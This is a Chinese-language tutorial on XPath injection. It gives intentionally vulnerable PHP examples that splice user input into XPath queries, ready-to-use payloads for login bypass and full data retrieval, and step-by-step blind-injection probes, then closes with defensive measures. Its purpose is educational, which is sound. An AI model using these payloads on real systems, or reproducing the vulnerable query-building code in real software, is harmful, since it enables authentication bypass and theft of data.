XPath注入攻击全面指南

0x00 前言

XPath注入是一种针对使用XPath查询XML数据的应用程序的攻击技术，类似于SQL注入。当应用程序未正确处理用户输入而直接拼接XPath查询时，攻击者可以构造恶意输入来操纵查询逻辑，获取未授权数据或绕过认证。

0x01 XPath基础

XPath(XML Path Language)是用于在XML文档中定位节点的语言，主要特点包括：

• 基于XML的树状结构
• 支持多种节点类型：元素节点、属性节点、文本节点
• 提供在数据结构树中找寻节点的能力

基本语法

• "nodename" - 选取nodename的所有子节点
• "/nodename" - 从根节点中选择
• "//nodename" - 从当前节点选择
• ".." - 选择当前节点的父节点
• "child::node()" - 选择当前节点的所有子节点
• "@" - 选择属性
• "//user[position()=2]" - 选择节点位置

0x02 XPath注入原理

XPath注入利用XPath解析器的松散输入和容错特性，通过在URL、表单等输入点注入恶意XPath代码来获取高权限信息访问权。与SQL注入不同，XPath中没有权限概念，攻击者可能获取完整XML文档数据。

0x03 常规XPath注入

漏洞示例

<?php
if(file_exists('t3stt3st.xml')) {
    $xml = simplexml_load_file('t3stt3st.xml');
    $user=$_GET['user'];
    $query="user/username[@name='".$user."']";
    $ans = $xml->xpath($query);
    foreach($ans as $x => $x_value){
        echo $x.": ".$x_value;
        echo "<br>";
    }
}
?>

注入检测

在参数后添加单引号'，观察是否有错误信息返回：

http://example.com/xpath/index.php?user=user1'

基本注入Payload

获取当前节点下所有用户：

user1' or 1=1 or ''='

对应的XPath查询变为：

user/username[@name='user1' or 1=1 or ''='']

访问所有节点

使用以下Payload可访问XML文档的所有节点：

']

0x04 登录绕过攻击

漏洞示例

<?php
if(file_exists('test.xml')){
    $xml=simplexml_load_file('test.xml');
    if($_POST['submit']){
        $username=$_POST['username'];
        $password=$_POST['password'];
        $x_query="/accounts/user[username='{$username}' and password='{$password}']";
        $result = $xml->xpath($x_query);
        if(count($result)==0){
            echo '登录失败';
        }else{
            echo "登录成功";
            $login_user = $result[0]->username;
            echo "you login as $login_user";
        }
    }
}
?>

已知用户名情况

使用以下Payload，密码可任意：

test' or 'a'='a

对应的XPath查询：

/accounts/user[username='test' or 'a'='a' and password='任意密码']

未知用户名情况（管理员登录）

假设第一个用户是管理员：

x' or 1=1 or ''='

对应的XPath查询：

/accounts/user[username='x' or 1=1 or ''='' and password='任意密码']

0x05 XPath盲注

当攻击者不清楚XML文档结构且没有错误信息返回时，可使用盲注技术逐步获取信息。

盲注步骤

1. 判断根节点下的节点数
2. 判断根节点下节点长度和名称
3. 递归猜解所有子节点
4. 最终获取节点值

常用盲注Payload

1. 判断根节点数量：

'or count(/)=1 or ''='

2. 判断根节点下子节点数量：

'or count(/*)=1 or ''='

3. 判断节点名称长度：

'or string-length(name(/*[1]))=8 or ''='

4. 逐字符猜解节点名称：

'or substring(name(/*[1]), 1, 1)='a' or ''='
'or substring(name(/*[1]), 2, 1)='c' or ''='
...
'or substring(name(/*[1]), 8, 1)='s' or ''='

5. 判断特定节点数量：

'or count(/accounts/user)=2 or ''='

6. 判断子节点值长度：

'or string-length((//user[position()=1]/username[position()=1]))=6 or ''='

7. 逐字符猜解子节点值：

'or substring((//user[position()=1]/username[position()=1]),1,1)='T' or ''='
...
'or substring((//user[position()=1]/username[position()=1]),6,1)='e' or ''='

0x06 防御措施

1. 输入验证：对用户输入进行严格过滤，特别是特殊字符如'、"、=、/、*等
2. 参数化查询：使用预编译的XPath查询，避免直接拼接用户输入
3. 最小权限原则：限制XML文档访问权限
4. 错误处理：避免返回详细的错误信息
5. 编码输出：对输出到页面的内容进行HTML编码

0x07 总结

XPath注入是一种严重的安全威胁，可能导致敏感数据泄露和认证绕过。了解其原理和攻击技术对于开发安全应用至关重要。通过实施适当的防御措施，可以有效地防止此类攻击。